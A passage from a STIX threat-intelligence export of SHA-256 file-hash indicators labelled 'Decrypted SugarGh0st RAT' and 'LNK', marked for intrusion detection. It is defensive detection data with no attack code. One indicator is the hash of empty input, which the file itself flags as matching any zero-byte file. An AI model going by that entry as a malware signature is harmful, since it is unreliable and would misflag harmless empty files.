"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '2432f192511fb377d69619fc7eb0612570e22e3ba88fc42e841552a66fe2dc8f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9ce3a1bd-6677-49fc-bba0-cd7a98f7e1eb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '53e7e7fce0d8fde3be0d6679193f924555df217b696f6dc201e1966e9f4efabd']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59057bf3-6220-4a96-ac49-458f2cad116d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'ac5342050b0ec85a122846510e06f861960c45613ecc05e3951c57d7d02aa716']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--365ab122-e71d-4f97-a8b6-bd5036e035f7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": 
"[file:hashes.SHA256 = '21cf0efec4def4a95af75a7bfdef915bf103a9a6cd03593b4f665f49cdbe4a02']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--453439ce-14e4-48b1-bd22-b62fcfaa47da", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '58754bf9701a39bf13959157db5761d19a562264ac79a8ae47b82589d17a1a07']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7cc6f2dd-8f4b-4915-bde7-3b23e8d9cd6f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '5f40142782f5e13334caf25f3038be324b3f47a3ee465f6da4442ec6e7920d5b']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--04fd3bb3-c9d7-48de-9dc8-ff6f18267231", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '862f6f60d6c145d99fb01476708c93e72f0b905ee54aba03904e92eaf3d8b2d9']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": 
"misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fd1e017e-a36c-4f32-ba13-54c5c999b98b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '99ab797804684699925b70bdf2ecbbb878f4a86e7b971349036700c72ad15fb1']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fa5acfb5-1e1c-4015-a964-1d68014d3fe9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '653281c876250878eb503e4377c3f79bdfec31e94b27e5413a1b9f8f0f84a6a4']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8b95b4ba-0720-4cdd-86b2-f1c6873ca8f4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'c8bfebff63e5f227aacb3a0aebcf40c973a4fbde6d37895c76498798e925cfb6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": 
"indicator--183b298f-964e-4113-8165-d2e18c3f8ce8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'cac8c35fd03cc8698e53cafa64941be59870380ecedd2f4998e110787224241c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0eed57e1-b6d0-4ee5-836b-d4e253ca28f3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '18270dd537c3e2f02513b51c3a89814f4c34aa994aa8d823bc534fa39d95dde2']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4561be59-ef13-4b99-9df8-5e0721954a6e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4509575df3a0a791838f13405122def4eae7f5d2d8142f4830f6944ecd913f03']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--76a0b7e6-fe95-47ac-99e0-d0feeb8f1e04", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": 
"2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '823d23f1bcc76b08773e988be209b4a2f1cf99b094732cde395bc40f0729948e']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9f06f98b-9e9d-4da8-9d03-5c87e332919f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '70359e4ce398ad356fd36f1f9306a570b36c552b83310332e5bf257f21cb1e9a']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--eef5e602-f8af-478b-b078-2c43d71cf09f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'e2a8ffe20d91720516b242d0053ae58474be4205b9926993eab13e6662cb9a91']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--294b1a5e-80ab-4aa0-adff-84f7ccff7d42", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '267eec9cd5ff136364e0346d62df0cbb0294e0fb8f672685e785bf3ffddfb76e']", 
"valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--004d5974-3799-4235-8d6a-2e18e7b3af66", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7ccb9b8964391360d6e122343d714301851c2332f0d50e037fe08591bd7c139d']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--337a442e-4495-4067-ae2e-9d92564018c8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7caca38b67f9f629912f21bc0d76f8a5782fc62cccb93f53d2d07fd21fd30c33']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--22f5e4ca-294c-483d-9a64-8c40f8a44865", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '66f2712d989950e3b6c1f56a08b2e8689ea8a48bf84c7cee93583c7e78591f3c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", 
"misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--50a1b683-26e1-46e2-b28e-9dc26cefd8e9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'b9a60ea9b1ac73e333b403f8471b5111a0ba67b60c9f0d7e44e2e290fccf6f42']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--97bcc14e-c7ea-4ecb-a6a3-507cac3e0a89", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '837164909df9b37bc31edcdb1207954337bad59a630b44f8ea06a594bcbe4035']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9de1c1fe-4740-4aa3-95eb-56e2a7d44bb8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4cdc33e535d07e6519b1be0520349dedaefcc464734b24d1e656414100680efe']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--15a2c00a-b852-4b96-9b0b-5ad4e196492e", "created_by_ref": 
"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK (caution: this value is the SHA-256 of empty input and matches any zero-byte file; likely a collection artifact rather than a sample-specific hash)", "pattern": "[file:hashes.SHA256 = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fa17ca90-0d67-4384-ab75-98255c2e71c3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'd31b5dd937655c14caff1cca6da88dc81f9cc523e119d43a9ac38dbb302eebbd']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--58e0435b-6cd5-4a2d-b5c1-e1c03300c2d0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '21123d5bf92e763c4ef34fd4f9ddcb1b3a4a2c9ab0fd5657f4f30b0964979274']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3ac7bf41-0877-4a13-b7e3-ec834f73a576", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 
'75b39e923c69b488ae6981d314075f7e423ba2236150c20d41112db8f80a4827']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b9a2c24f-185e-4505-90d2-230cb0b052ee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6071f84650b3226f60068f5f7a1dc7c7ec819ab7b6e8dcf341638b966fda44b0']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9802b013-445d-477a-adc3-e5072561fc7f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '510acd67d4c5fb45d6721283ed0eb4128347458ccb2b00feda9787f138c35278']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--14457179-5310-404c-82e4-13451899f4bf", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4f98dc3df220f41bce3c3a2714392279e68dd24a53c7c2f22a0a9850eb5d8476']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", 
"misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--51677e36-30e1-4c18-9e35-110716d52dac", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2e2aef8948f5e2d93df7f4412fadc31500feb9035ceff18cce85393c6e230088']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--dcdd5dc9-f60d-4b1a-b755-284eae3033ab", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c0230704e1ee34666c40b2a3898666ba3929283ad0a86b63ab0fad6f4a0555ec']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3bc0c79d-41e1-4000-807d-d05290e5344c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f7de8e94f280f9b943950a75ae78032c6501261a12650a6f757107bc8df6c3c2']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3e01d0e1-f8d8-479f-9d5f-2a57121b5b81", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": 
"2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bc73528b391f30acdd3c3a1674bc7973d3026c367142d72684facd68915851f6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68897ecf-1e90-428c-bc3d-d1434e66b7b9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e11908adf04627812cfa721189dfa06f884ceedff2dfa3b18578494995561716']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--469403e9-ea50-4db3-8f22-da6747dc46d4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0fcc045db0d07ea4909a487273d313f796fa19ee8095a5272dfc5d6f3484f4ec']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--555e14b3-2549-492f-9244-a94a4f1b12ac", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bdcc0bc3f5d022f99a1599c7cbed3aa2b6839e1e1d05ed2448dbd8b7ab34c784']", "valid_from": "2024-06-19T08:09:17Z", 
"kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--26c5b8d0-7437-40ce-ac7c-8da55c3ddbec", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '065f10e2a92b433a779c508e4add9c096b2891f5417fa183e58c8b8f7f9f8524']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c9727765-903d-4955-ac71-1e2d4d54de5c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '87bda94d6b5ad0170c07abe540f530e797c6fec7410b30796e265cc21997d735']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e89c5bed-5701-4689-a0b8-50bd69c27994", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '401720fa24dc03cce8640b00d00c57676a8369ee49f456bd771a6ecbd81b82b6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": 
"indicator--e46033b3-57ad-4c0f-a867-d602de55d019", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '84572497f7022163bbb2e9885c942b1bcfa1793305c116ac898ee1b52ab6f898']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8d021809-dc2d-4509-9e2c-493365ea1afc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2f32e99c182f0f7cf6ff54d9d1a9d9f7e59823030d2a89e15890c2c8b1612caf']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d5219c09-b2f1-4c23-8b1d-718ef6eccdd9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '57e3c92639027738e5a867d2f66d30a9509a96573d7a5eeee1c2a710faf9321c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--93717411-b875-4675-8221-1ad4065ade3a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": 
"[file:hashes.SHA256 = '7528cf4daa8f0b4108ff220bc98f6046faf446653a3f98edc1d58350490d9fc8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--99df17c8-febb-4b49-8ab2-da8e51bccb83", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'b89ebfdfa9abb0ab618ebf2baf66b6cf27929d1e6599b3cb174c12e0a4c71d96']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a2abe63e-640d-4741-95a3-63ffe8ae170c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6f8ccda88e0ff98c781ad6e027f4294eb54bff27a3ca1cd72aa83e4082013860']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c3f7aa63-d41c-4763-84c4-d8327fb80ad4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '162594cdb38526300af0db4acd13dd7a5a4ac07004bf32f887b6f149236160b7']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
